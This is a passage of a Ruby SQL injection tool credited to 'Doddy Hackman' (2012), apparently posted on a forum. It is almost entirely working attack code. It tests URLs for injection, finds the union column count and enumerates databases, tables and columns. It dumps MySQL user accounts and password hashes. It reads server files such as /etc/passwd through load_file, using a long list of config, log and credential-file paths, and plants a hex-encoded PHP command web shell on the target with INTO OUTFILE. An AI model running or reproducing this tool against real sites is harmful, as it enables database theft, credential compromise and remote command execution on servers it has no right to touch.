\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']

    def toma(web)
      return Net::HTTP.get_response(URI.parse(web)).body
    end

    def copyright()
      print "\n\n(C) Doddy Hackman 2012\n\n"
      gets.chomp
    end

    def installer()
      dir = Dir::pwd+"/"+"logs_webs"
      if not FileTest::directory?(dir)
        Dir::mkdir(dir)
      end
    end

    def encodehex(texto)
      return "0x"+(texto.unpack('H*')[0])
    end

    def savefile(file,text)
      url = URI.parse(file)
      save = File.open("logs_webs/"+url.host+".txt","a")
      save.puts text+"\n"
      save.close
    end

    def bypass(op)
      if op=="--"
        return "+","--"
      elsif op=="/*"
       return "/**/","/**/"
      elsif op=="%20"
       return "%20","%00"
      else
       return "+","--"   
      end
    end

    def head()
     
      print "
     
    @      @@   @             
    @@     @  @ @@             
    @ @@  @  @  @ @   @ @ @@@
    @ @   @  @  @@ @ @@@ @  @
    @@    @  @  @  @  @   @@@
    @ @   @  @  @  @  @  @  @
    @@@ @   @@   @@@  @@@ @@@@@

    "
    end

    def volverinicio()
      print "\n\n[+] Press any key to continue\n\n"
      gets.chomp
      inicio()
    end

    def clean()
      if RUBY_PLATFORM=~/win/
        system("cls")
      else
        system("clear")
      end
    end

    def retorno(url,by)
      print "\n\n[+] Press any key to continue\n\n"
      gets.chomp
      central(url,by)
    end

    def gettables(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
      print "\n\n[+] Getting tables ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Tables Found : ",total,"\n\n"
        savefile(url,"\n[+] Tables Found : #{total}\n")
        for num in ("17"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Table Found : "+table+"\n"
            savefile(url,"[+] Table Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def getcolumns(url,by,tablex)
      tablexa = encodehex(tablex)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
      print "\n\n[+] Getting columns ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Columns Found : ",total,"\n\n"
        savefile(url,"\n[+] Table : #{tablex}")
        savefile(url,"[+] Columns Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Column Found : "+table+"\n"
            savefile(url,"[+] Column Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def getdbs(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
      print "\n\n[+] Getting DBS ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] DBS Found : ",total,"\n\n"
        savefile(url,"\n[+] DBS Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] DB Found : "+table+"\n"
            savefile(url,"[+] DB Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def gettablesbydb(url,by,dbx)
      data  = encodehex(dbx)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
      print "\n\n[+] Getting tables ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Tables Found : ",total,"\n\n"
        savefile(url,"\n[+] DBS : #{dbx}")
        savefile(url,"[+] Tables Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Table Found : "+table+"\n"
            savefile(url,"[+] Table Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def getcolumnsbydb(url,by,db,tab)
      data = encodehex(db)
      tabx = encodehex(tab)
     
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
      print "\n\n[+] Getting columns ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Columns Found : ",total,"\n\n"
        savefile(url,"\n[+] DB : #{db}")
        savefile(url,"[+] Table : #{tab}")
        savefile(url,"[+] Columns Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*?)K0BRA/
            table = $1
            print "[+] Column Found : "+table+"\n"
            savefile(url,"[+] Column Found : #{table}")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def mysqluser(url,by)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
       print "\n\n[+] Searching mysql.user\n\n"
      code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        print "[+] Users Mysql Found : ",total,"\n\n"
        savefile(url,"[+] Users Mysql Found : "+total+"\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
            host,user,passw = $1,$2,$3
            print "[Host] : "+host
            print " [User] : "+user
            print " [Pass] : "+passw+"\n"   
            savefile(url,"[Host] : "+host)
            savefile(url,"[User] : "+user)
            savefile(url,"[Pass] : "+passw+"\n")
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def details(url,by)
      pass1,pass2 = bypass(by)
      hextest = "0x2f6574632f706173737764" #/etc/passwd
      hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
      web1 = url.sub(/hackman/,"0x4b30425241")
      web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
      web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
       print "\n\n[+] Extrating information of the DB\n\n"
      code1 = toma(web2)
      if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
        user,data,ver = $1,$2,$3
        print "\n[+] Username : "+user
        print "\n[+] Database : "+data
        print "\n[+] Version : "+ver+"\n\n"
        savefile(url,"\n[+] Username : "+user)
        savefile(url,"[+] Database : "+data)
        savefile(url,"[+] Version : "+ver+"\n")
      else
        print "[-] Not Found\n"
      end
       code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
       code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
       code4 = toma(web3)
       if code2=~/K0BRA/
         print "[+] Mysqluser : ON\n"
         savefile(url,"[+] Mysqluser : ON")
       end
       if code3=~/K0BRA/
         print "[+] information_schema : ON\n"
         savefile(url,"[+] information_schema : ON")
       end
       if code4=~/ERTOR854/
         print "[+] load_file : ON\n"
         savefile(url,"[+] load_file : ON")
       end   
       savefile(url,"") #espacio en blanco
    end

    def dumper(url,by,table,col1,col2)
      pass1,pass2 = bypass(by)
      web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
      web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
      print "\n\n[+] Getting Values ...\n\n"
      code1 = toma(web1+pass1+"from"+pass1+table+pass2)
      if code1=~/K0BRA(.*?)K0BRA/
        total = $1
        savefile(url,"\n[+] Table : "+table)
        savefile(url,"[+] Column 1 : "+col1)
        savefile(url,"[+] Column 2 : "+col2)
        print "[+] Values Found : ",total,"\n\n"
        savefile(url,"\n[+] Values Found : #{total}\n")
        for num in ("0"..total)
          code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
          if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
            uno,dos = $1,$2
            print "\n[+] "+col1+" : "+uno+"\n"
            print "[+] "+col2+" : "+dos+"\n"
            savefile(url,"\n[+] "+col1+" : "+uno)
            savefile(url,"[+] "+col2+" : "+dos)
          end
        end
      else
        print "[-] Not Found\n"
      end
    end

    def fuzzfile(url,by)
      pass1,pass2 = bypass(by)
      print "\n\n[+] Fuzzing Files with load_file ....\n"
      $files.each do |file|
        res = file
        file = file.chomp
        file = encodehex(file)
        web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
        code = toma(web1)
        if code=~/ERTOR854(.*?)ERTOR854/m
          print "\n\n[File Found] : ",res
          print "\n\n[Source Start]\n"
          print $1
          print "\n[Source End]"
          savefile(url,"\n[File Found] : "+res)
          savefile(url,"\n[Source Start]\n")
          savefile(url,$1)
          savefile(url,"\n[Source End]")
        end   
      end
    end

    def abrirfile(url,by,file)
      pass1,pass2 = bypass(by)
      print "\n\n[+] Opening file ....\n"
      res = file
      file = encodehex(file)
        web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
        code = toma(web1)
        if code=~/ERTOR854(.*?)ERTOR854/m
          print "\n\n[File Found] : ",res
          print "\n\n[Source Start]\n"
          print $1
          print "\n[Source End]"
          savefile(url,"\n[File Found] : "+res)
          savefile(url,"\n[Source Start]\n")
          savefile(url,$1)
          savefile(url,"\n[Source End]")
        else
          print "\n\n[-] Error\n\n"
        end   
    end

    def into(url,by,full,dir)
      pass1,pass2 = bypass(by)
      linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
      lugar = full+"/cmd.php"
      lugardos = dir+"/cmd.php"
      h = URI.parse(url)
      webtest = "http://"+h.host+lugardos
      web1 = url.sub(/hackman/,linea)
      formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
      toma(formandoweb)
      code = toma(webtest)
      if code=~/Mini Shell By Doddy/
        print "\n\n[shell up] : "+webtest+"\n"
        savefile(url,"\n[shell up] : "+webtest+"\n")
      else
        print "\n\n[-] Error\n"
      end
    end

    def central(url,by)
      clean()
      head()
      print "\n\n[+] Page : #{url}\n"
      print "[+] ByPass : #{by}\n\n\n"

      print "\n[information_schema]\n\n"
      print "1 - Show tables\n"
      print "2 - Show columns of the a table\n"
      print "3 - Show databases\n"
      print "4 - Show tables from the a DB\n"
      print "5 - Show columns from the a table of the DB\n"
      print "\n[mysql.user]\n\n"
      print "6 - Show users\n"
      print "\n[Others]\n\n"
      print "7 - Show details\n"
      print "8 - Dump data\n"
      print "9 - Fuzz Files with load_file\n"
      print "10 - Load files with load_file\n"
      print "11 - Create Shell\n"
      print "12 - Show log\n"
      print "13 - Change target\n"
      print "14 - Exit\n\n"
     
      print "[+] Option : "
      op = gets.chomp
       
      if op == "1"
        gettables(url,by)
        retorno(url,by)
      elsif op == "2"
        print "\n\n[+] Table : "
        table = gets.chomp
        getcolumns(url,by,table)
        retorno(url,by)
      elsif op == "3"
        getdbs(url,by)
        retorno(url,by)
      elsif op == "4"
        print "\n\n[+] DB : "
        db = gets.chomp
        gettablesbydb(url,by,db)
        retorno(url,by)
      elsif op == "5"
        print "\n\n[+] DB : "
        db = gets.chomp
        print "\n\n[+] Table : "
        tab = gets.chomp
        getcolumnsbydb(url,by,db,tab)
        retorno(url,by)
      elsif op == "6"
        mysqluser(url,by)
        retorno(url,by)
      elsif op == "7"
        details(url,by)
        retorno(url,by)
      elsif op == "8"
        print "\n\n[+] Table : "
        table = gets.chomp
        print "\n\n[+] Column 1 : "
        col1 = gets.chomp
        print "\n\n[+] Column 2 : "
        col2 = gets.chomp
        dumper(url,by,table,col1,col2)
        retorno(url,by)
      elsif op == "9"
        fuzzfile(url,by)
        retorno(url,by)
      elsif op == "10"
        print "\n\n[+] File : "
        file = gets.chomp
        abrirfile(url,by,file)
        retorno(url,by)
      elsif op == "11"
        print "\n\n[Full Source Discloure] : "
        full = gets.chomp
        print "\n\n[Directory to test] : "
        dir = gets.chomp
        into(url,by,full,dir)
        retorno(url,by)
      elsif op == "12"
        urla = URI.parse(url)
        ar = "logs_webs/"+urla.host+".txt"
        system("start #{ar}")
        retorno(url,by)
      elsif op == "13"
        inicio()
      elsif op == "14"
        copyright()
      else
        retorno(url,by)
      end
    end

    def findlength(url,by)
      pass1,pass2 = bypass(by)
      z = "1"
      x = "concat(0x4b30425241,1,0x4b30425241)"
      for num in ('2'..'25')
        z = z+","+num
        x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
        code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
        if code=~/K0BRA(.*?)K0BRA/
          print "[+] The Page has "+num+" columns\n"
          print "[+] The number "+$1+" print data"
          z = z.sub($1,"hackman")
          sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
          savefile(url,"[+] SQLI : "+sqli)
          savefile(url,"[+] Bypass : "+by+"\n")
          central(sqli,by)
        end
      end
    end

    def testvul(page,by)
      pass1,pass2 = bypass(by)
      print "\n\n[+] Testing vulnerability ...\n\n"
      codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
      codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
      if codeuno != codedos
        print "[+] Vulnerable !\n"
        findlength(page,by)
      else
        print "[-] Not vulnerable\n"
        print "\n\n[+] Scan anyway y/n : "
        op = gets.chomp
        if op == "y"
          findlength(page,by)
      else
        volverinicio()
      end
    end 
    end

    def inicio()
      clean()
      head()
      print "\n\n[+] Page : "
      page = gets.chomp
      print "\n\n[+] Bypass : "
      by = gets.chomp
      if page=~/hackman/
        central(page,by)
      else
        testvul(page,by)
      end
    end

    installer()
    inicio()

    # The End ?
Páginas 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 55